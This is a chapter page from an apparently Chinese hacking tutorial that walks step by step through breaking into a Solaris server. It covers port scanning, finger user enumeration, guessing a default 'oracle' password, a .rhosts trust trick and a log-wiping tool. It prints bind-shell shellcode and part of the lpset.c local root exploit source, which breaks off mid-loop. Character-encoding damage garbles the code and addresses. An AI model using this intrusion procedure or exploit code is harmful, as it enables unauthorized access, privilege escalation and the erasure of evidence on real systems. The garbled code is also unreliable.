友情提示：如果本网页打开太慢或显示不完整，请尝试鼠标右键“刷新”本网页！阅读过程发现任何错误请告诉我们，谢谢！！报告错误

30天打造专业红客-第19章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！

　　　　本机IP：127。0。0。1
　　　　测试IP：127。0。0。17
　　　　新程序说明：
　　　　“lpset。c”是利用solaris　7和solaris　2。6的/usr/bin/lpset　…a　缓冲区溢出漏洞所写的一个exploit。
　　　　Solaris　7　lpset　…a　缓冲区溢出漏洞　
　　　　Solaris　2。6和Solaris　7中所带的lpset缺省设置了suid　root位，它的一个执行选项〃…a〃在处
　　　　理时存在问题，它会将提供给〃…a〃的参数不加判断的拷贝到一个固定大小的buffer（900多字节）
　　　　中；当用户提供一个包含可执行代码的很长的字符串时，将导致lpset以root身份执行任意命令。
　　　　尽管lpset缺省只允许root和sysadm组的用户执行，但是，由于溢出发生在进行执行权限判断操
　　　　作之前，任意本地用户都可以利用这个漏洞获取root权限。
　　　　wipe…1。00：unix和liunx下，一个非常好用的日志清除程序。
　　　　新名词讲解：
　　　　肉鸡：已经被攻击了，具有控制权的主机。
　　　　跳板：利用此主机作跳板，攻击其他主机。
　　　　shell：shell是系统与用户的交换式界面。简单来说，就是系统与用户的“沟通”环境。我们平时经常用到的DOS，就是一个shell。（Windows2000是cmd。exe）
　　　　root：Unix里最高权限的用户。也就是超级管理员。
　　　　admin：Windows　NT里最高权限的用户。也就是超级管理员。
　　　　rootshell：通过一个溢出程序，在主机溢出一个具有root权限的shell。
　　　　exploit：溢出程序。exploit里通常包含一些shellcode。
　　　　shellcode：溢出攻击要调用API函数，溢出后要有一个交换式界面进行操作。所以就有了shell的code。
　　　　char　shellcode＇＇　=　〃x31xdbx31xc9x31xc0xb0x46xcdx80〃　〃x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8〃　〃x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89〃　〃x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0〃　〃x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd〃　〃x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9〃　〃xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75〃　〃x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08〃　〃x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh〃；
　　　　这就是一个shellcode。
　　　　找一个Unix主机也是一种技巧。
　　　　1、首先，我们打开superscan。
　　　　设置：
　　　　IP：（需要扫描的IP地址。）
　　　　Start：127。0。0。1
　　　　Stop：127。0。0。255
　　　　Scan　Type：（扫描类型设置。）
　　　　All　ports　from：23｜23
　　　　然后，点击“Start”，开始扫描。　
　　　　2、点击“Prune”，把多余的主机删除。　
　　　　3、点击“Expand　All”，把所有扫描到的主机打开。这时，在端口下面就会显示一些信息。这些信息就是端口的响应。　
　　　　小技巧：　
　　　　。。。。。。。。#。。'。。：这种响应，通常是Sunos主机的。　
　　　　。。。。。　。。#。。'：这种响应，通常是liunx的。　
　　　　假设，我们扫描到：127。0。0。17。　
　　　　打开，Windows自带的“命令提示符”。
　　　　ping　主机：
　　　　主要目的是查看主机是否能连接。
　　　　D：》ping　127。0。0。17
　　　　Pinging　127。0。0。17　with　32　bytes　of　data：
　　　　Reply　from　127。0。0。17：　bytes=32　time=191ms　TTL=241
　　　　Reply　from　127。0。0。17：　bytes=32　time=170ms　TTL=241
　　　　Reply　from　127。0。0。17：　bytes=32　time=160ms　TTL=241
　　　　Reply　from　127。0。0。17：　bytes=32　time=170ms　TTL=241
　　　　Ping　statistics　for　127。0。0。17：
　　　　　Packets：　Sent　=　4；　Received　=　4；　Lost　=　0　（0％　loss）；
　　　　Approximate　round　trip　times　in　milli…seconds：
　　　　　Minimum　=　160ms；　Maximum　=　　191ms；　Average　=　　172ms
　　　　小技巧：
　　　　通常　TTL　》　200的，都是liunx或者unix系统。
　　　　TTL　《　200的，都是Windows　9x或Windows　NT系统。
　　　　telnet主机：
　　　　主要看看telnet的banner。
　　　　D：》telnet　127。0。0。17
　　　　SunOS　5。7
　　　　login：
　　　　solaris　7　的。
　　　　接着，我用Superscan扫描主机的端口。
　　　　方法：
　　　　打开superscan。
　　　　设置：
　　　　IP：
　　　　Start：127。0。0。17
　　　　Stop：127。0。0。17
　　　　Scan　Type：（扫描类型设置。）
　　　　All　ports　from：1｜65535
　　　　然后，点击“Start”，开始扫描。　
　　　　扫描完毕后，点击“Expand　All”，把所有扫描到的端口打开。　
　　　　*　＋　211。99。25。1
　　　　｜___　7　Echo
　　　　｜___　9　Discard
　　　　｜___　13　Daytime
　　　　｜___　19　Character　Generator
　　　　｜___　21　File　Transfer　Protocol　＇Control＇
　　　　｜___　23　Telnet
　　　　｜___　25　Simple　Mail　Transfer
　　　　｜___　37　Time
　　　　｜___　53　Domain　Name　Server
　　　　｜___　79　Finger
　　　　｜___　111　SUN　Remote　Procedure　Call
　　　　｜___　512　remote　process　execution；
　　　　｜___　513　remote　login　a　la　telnet；
　　　　｜___　514　cmd
　　　　｜___　515　spooler
　　　　｜___　540　uucpd
　　　　主要的端口有：21、25、53、79、111、513
　　　　其他还有：22、80等
　　　　端口的主要漏洞：
　　　　21：FTP的端口。主要漏洞是ftpd。如果允许anonymous（匿名）用户，而且具有读写权限，那么那台机子就是你的啦。假如你具有读写权限的用户密码，那就更加容易了。
　　　　22：ssh的端口。例如：SSH　3。0的远程登录漏洞等。
　　　　25：sendmail的端口。利用它的漏洞，我们可以D。O。S主机。freebsd的8。8。3版本还可以远程溢出rootshell。
　　　　53：DNS的端口。主要漏洞是bind。对于bind　8。2的DNS服务器，我们可以利用exploit溢出一个rootshell。
　　　　79：finger的端口。在unix和liunx都很有作用。对于Sunos，我们可以　finger　0@***。***。***。***　刺探用户。对于，liunx可以　finger　@***。***。***。***　刺探当前在线的用户。
　　　　80：web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。
　　　　111：rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如：redhat的rpc。statd，Solaris的rpc。ttdbserverd等。
　　　　513：rlogin的端口。你可以向主机发送一条：echo　'＋　＋'　》/。rhost　如果成功，就可以不用密码rlogin到主机。
　　　　finger主机。
　　　　目的是利用finger漏洞寻找主机的用户。（取得主机的用户对入侵主机有很大帮助。）
　　　　D：》finger　0@127。0。0。17
　　　　＇127。0。0。17＇
　　　　Login　NameTTYIdle　When　Where
　　　　daemon　？？？　《　。　　。　　。　　。　》
　　　　bin　？？？　《　。　　。　　。　　。　》
　　　　sys　？？？　《　。　　。　　。　　。　》
　　　　chenhy　？？？pts/7　　　61。158。255。225
　　　　mdevice？？？897　　61。140。253。142
　　　　liuy？？？pts/5　　　211。101。132。50
　　　　oracle　？？？console　　6：57　Mon　14：29　　：0
　　　　oracle　？？？pts/24d　Mon　14：29　　：0。0
　　　　oracle　？？？pts/522　Sat　16：34　　61。140。253。142
　　　　D：》
　　　　存在finger漏洞。系统的用户显示出来了。（chenhy、mdevice、liuy、orcle）
　　　　oracle，通常oracle的密码就是oracle。
　　　　马上试一下！
　　　　D：》telnet　127。0。0。17
　　　　SunOS　5。7
　　　　login：　oracle
　　　　Password：
　　　　Last　login：　Sat　Aug　　4　17：25：49　from　61。140。253。142
　　　　Sun　Microsystems　Inc。SunOS　5。7　Generic　October　1998
　　　　
　　　　成功了！
　　　　假如在这一步并没有猜到用户的密码，我们可以利用其他工具继续猜测。
　　　　　
　　　　命令：uname　…a
　　　　查看主机的信息。　
　　　　uname　…a
　　　　SunOS　mars　5。7　Generic_106541…08　sun4u　sparc　SUNW；Ultra…5_10
　　　　SunOS　mars　5。7：SunOS的版本。
　　　　sparc：服务器版本。
　　　　Generic_106541…08：补丁情况。
　　　　　
　　　　找到exploit：lpset。c
　　　　cat　》lpst。c
　　　　/*##　copyright　LAST　STAGE　OF　DELIRIUM　apr　2000　poland　　*：//lsd…pl/　#*/
　　　　/*##　/usr/bin/lpset　#*/
　　　　#define　NOPNUM　864
　　　　#define　ADRNUM　132
　　　　#define　ALLIGN　3
　　　　char　shellcode＇＇=
　　　　　〃x20xbfxffxff〃　　/*　bn；a　　　*/
　　　　　〃x20xbfxffxff〃　　/*　bn；a　　*/
　　　　　〃x7fxffxffxff〃　　/*　call　　　*/
　　　　　〃x90x03xe0x20〃　　/*　add　　％o7；32；％o0　　*/
　　　　　〃x92x02x20x10〃　　/*　add　　％o0；16；％o1　　*/
　　　　　〃xc0x22x20x08〃　　/*　st％g0；＇％o0＋8＇　*/
　　　　　〃xd0x22x20x10〃　　/*　st％o0；＇％o0＋16＇*/
　　　　　〃xc0x22x20x14〃　　/*　st％g0；＇％o0＋20＇*/
　　　　　〃x82x10x20x0b〃　　/*　mov　　0xb；％g1　　*/
　　　　　〃x91xd0x20x08〃　　/*　ta8　　*/
　　　　　〃/bin/ksh〃
　　　　；
　　　　char　jump＇＇=
　　　　　〃x81xc3xe0x08〃　　/*　jmp　　％o7＋8　*/
　　　　　〃x90x10x00x0e〃　　/*　mov　　％sp；％o0　　*/
　　　　；
　　　　static　char　nop＇＇=〃x80x1cx40x11〃；
　　　　main（int　argc；char　**argv）｛
　　　　　char　buffer＇10000＇；adr＇4＇；*b；
　　　　　int　i；
　　　　　printf（〃copyright　LAST　STAGE　OF　DELIRIUM　apr　2000　poland　　//lsd…pl/n〃）；
　　　　　printf（〃/usr/bin/lpset　for　solaris　2。6　2。7　sparcnn〃）；
　　　　　*（（unsigned　long*）adr）=（*（unsigned　long（*）（））jump）（）＋10088＋400；
　　　　　b=buffer；
　　　　　sprintf（b；〃***=〃）；
　　　　　b＋=4；
　　　　　for（i=0；i

返回目录上一页下一页回到顶部赞（0）踩（0）

未阅读完？加入书签已便下次继续阅读！

温馨提示：温看小说的同时发表评论，说出自己的看法和其它小伙伴们分享也不错哦！发表书评还可以获得积分和经验奖励，认真写原创书评被采纳为精评可以获得大量金币、积分和经验奖励哦！